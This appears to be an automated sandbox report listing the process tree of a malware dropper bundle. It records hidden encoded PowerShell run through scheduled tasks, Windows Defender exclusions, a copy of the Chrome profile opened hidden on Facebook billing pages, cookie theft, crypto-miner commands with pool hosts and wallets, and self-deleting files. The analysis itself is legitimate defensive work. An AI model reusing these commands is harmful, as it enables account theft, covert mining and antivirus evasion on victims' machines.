        19⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "giQzPxIjQ" /SC once /ST 04:29:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        17⤵
        Creates scheduled task(s)
        
        PID:7228
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "giQzPxIjQ"
        17⤵
        Modifies registry class
        
        PID:4164
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "giQzPxIjQ"
        17⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe\" 9n /site_id 754 /S" /V1 /F
        17⤵
        Creates scheduled task(s)
        
        PID:6780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe & exit
        15⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe
        16⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 1 3.1616869596.605f78dc47b39 104
        18⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 2 3.1616869596.605f78dc47b39
        19⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\is-00ASS.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-00ASS.tmp\vict.tmp" /SL5="$30642,870426,780800,C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\is-RMNH5.tmp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RMNH5.tmp\winhost.exe" 535
        22⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\l5v1t43fgiz\sczfhdica0k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\l5v1t43fgiz\sczfhdica0k.exe" /ustwo INSTALL
        20⤵
        
        PID:2032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 648
        21⤵
        Program crash
        
        PID:4628
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 664
        21⤵
        Program crash
        
        PID:5236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 704
        21⤵
        Program crash
        
        PID:4324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 676
        21⤵
        Program crash
        
        PID:6868
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 888
        21⤵
        Program crash
        
        PID:5192
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 728
        21⤵
        Program crash
        
        PID:8364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1156
        21⤵
        Program crash
        
        PID:8232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1128
        21⤵
        Program crash
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\3zgd2nlhz0s\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3zgd2nlhz0s\AwesomePoolU1.exe"
        20⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\is-7ETO0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7ETO0.tmp\Setup3310.tmp" /SL5="$10654,138429,56832,C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\is-VK8FE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VK8FE.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Local\Temp\selekvzv144\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\selekvzv144\app.exe" /8-23
        20⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Restless-Sea'
        21⤵
        
        PID:5512
        
        C:\Program Files (x86)\Restless-Sea\7za.exe
        
        "C:\Program Files (x86)\Restless-Sea\7za.exe" e -p154.61.71.13 winamp.7z
        21⤵
        
        PID:1572
        
        C:\Program Files (x86)\Restless-Sea\app.exe
        
        "C:\Program Files (x86)\Restless-Sea\app.exe" /8-23
        21⤵
        
        PID:10060
        
        C:\Users\Admin\AppData\Local\Temp\gnqoijrjfsz\snvahupqnbe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gnqoijrjfsz\snvahupqnbe.exe" /1-610
        20⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Dry-Resonance'
        21⤵
        
        PID:7964
        
        C:\Program Files (x86)\Dry-Resonance\7za.exe
        
        "C:\Program Files (x86)\Dry-Resonance\7za.exe" e -p154.61.71.13 winamp.7z
        21⤵
        
        PID:3512
        
        C:\Program Files (x86)\Dry-Resonance\snvahupqnbe.exe
        
        "C:\Program Files (x86)\Dry-Resonance\snvahupqnbe.exe" /1-610
        21⤵
        
        PID:9380
        
        C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe" ll
        17⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\is-FU13B.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FU13B.tmp\setups.tmp" /SL5="$9031E,408070,216064,C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe" ll
        18⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\a8-69a57-70f-145b1-a282234107dbc\Kiqafanicy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a8-69a57-70f-145b1-a282234107dbc\Kiqafanicy.exe"
        14⤵
        
        PID:3088
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2192
        15⤵
        
        PID:7656
        
        C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\2uc2epr43da\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2uc2epr43da\AwesomePoolU1.exe"
        8⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\g5arx0us5xk\s3jzz2sspe0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\g5arx0us5xk\s3jzz2sspe0.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:5412
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 648
        9⤵
        Program crash
        
        PID:5352
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 664
        9⤵
        Program crash
        
        PID:5280
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 632
        9⤵
        Program crash
        
        PID:5936
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 624
        9⤵
        Program crash
        
        PID:3716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 880
        9⤵
        Program crash
        
        PID:5320
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 952
        9⤵
        Program crash
        
        PID:6328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1284
        9⤵
        Program crash
        
        PID:5752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1336
        9⤵
        Program crash
        
        PID:6552
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1444
        9⤵
        Program crash
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\is-5AEV2.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5AEV2.tmp\vpn.tmp" /SL5="$303E6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:6568
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:6796
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6788
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:7276
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\0urlz0w1jqn\0yyetja1get.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0urlz0w1jqn\0yyetja1get.exe" /1-610
        8⤵
        Executes dropped EXE
        
        PID:5604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Frosty-Silence'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5648
        
        C:\Program Files (x86)\Frosty-Silence\7za.exe
        
        "C:\Program Files (x86)\Frosty-Silence\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        
        PID:6944
        
        C:\Program Files (x86)\Frosty-Silence\0yyetja1get.exe
        
        "C:\Program Files (x86)\Frosty-Silence\0yyetja1get.exe" /1-610
        9⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\aixs05o4j45\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aixs05o4j45\app.exe" /8-23
        8⤵
        Executes dropped EXE
        
        PID:5692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Solitary-Dream'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5724
        
        C:\Program Files (x86)\Solitary-Dream\7za.exe
        
        "C:\Program Files (x86)\Solitary-Dream\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        
        PID:6964
        
        C:\Program Files (x86)\Solitary-Dream\app.exe
        
        "C:\Program Files (x86)\Solitary-Dream\app.exe" /8-23
        9⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\is-66TOS.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-66TOS.tmp\IBInstaller_97039.tmp" /SL5="$10568,9935198,721408,C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5848
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://ilovenigerdickz.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe"
        10⤵
        Executes dropped EXE
        
        PID:6052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe"
        11⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        12⤵
        Runs ping.exe
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe" /quiet SILENT=1 AF=756
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5736
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616613711 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:6580
    - - C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe" ll
        5⤵
        Executes dropped EXE
        
        PID:2012
      - C:\Users\Admin\AppData\Local\Temp\is-M65N5.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M65N5.tmp\setups.tmp" /SL5="$202EA,408070,216064,C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:844
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Drops Chrome extension
      Suspicious use of AdjustPrivilegeToken
      PID:364
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4160
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
    - - C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        5⤵
        Enumerates system info in registry
        
        PID:3012
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        5⤵
        Suspicious use of FindShellTrayWindow
        
        PID:1772
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcf1c56e00,0x7ffcf1c56e10,0x7ffcf1c56e20
        6⤵
        
        PID:1924
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2176 /prefetch:8
        6⤵
        
        PID:1572
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1892 /prefetch:8
        6⤵
        
        PID:4504
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:2
        6⤵
        
        PID:4412
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
        6⤵
        
        PID:3188
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
        6⤵
        
        PID:2068
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        6⤵
        
        PID:4832
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        6⤵
        
        PID:3424
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
        6⤵
        
        PID:900
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
        6⤵
        
        PID:4532
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3076 /prefetch:2
        6⤵
        
        PID:3540
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3948 /prefetch:8
        6⤵
        
        PID:6356
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5172 /prefetch:8
        6⤵
        
        PID:7568
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3856 /prefetch:8
        6⤵
        
        PID:5304
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3776 /prefetch:8
        6⤵
        
        PID:7928
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
        6⤵
        
        PID:7220
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1476 /prefetch:1
        6⤵
        
        PID:7116
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
        6⤵
        
        PID:8052
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      Executes dropped EXE
      PID:2808
    - - C:\Users\Admin\AppData\Roaming\681C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\681C.tmp.exe"
        5⤵
        
        PID:5552
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:5316
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:4432
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:6448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:6484
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:6236
    - - C:\ProgramData\8208940.exe
        
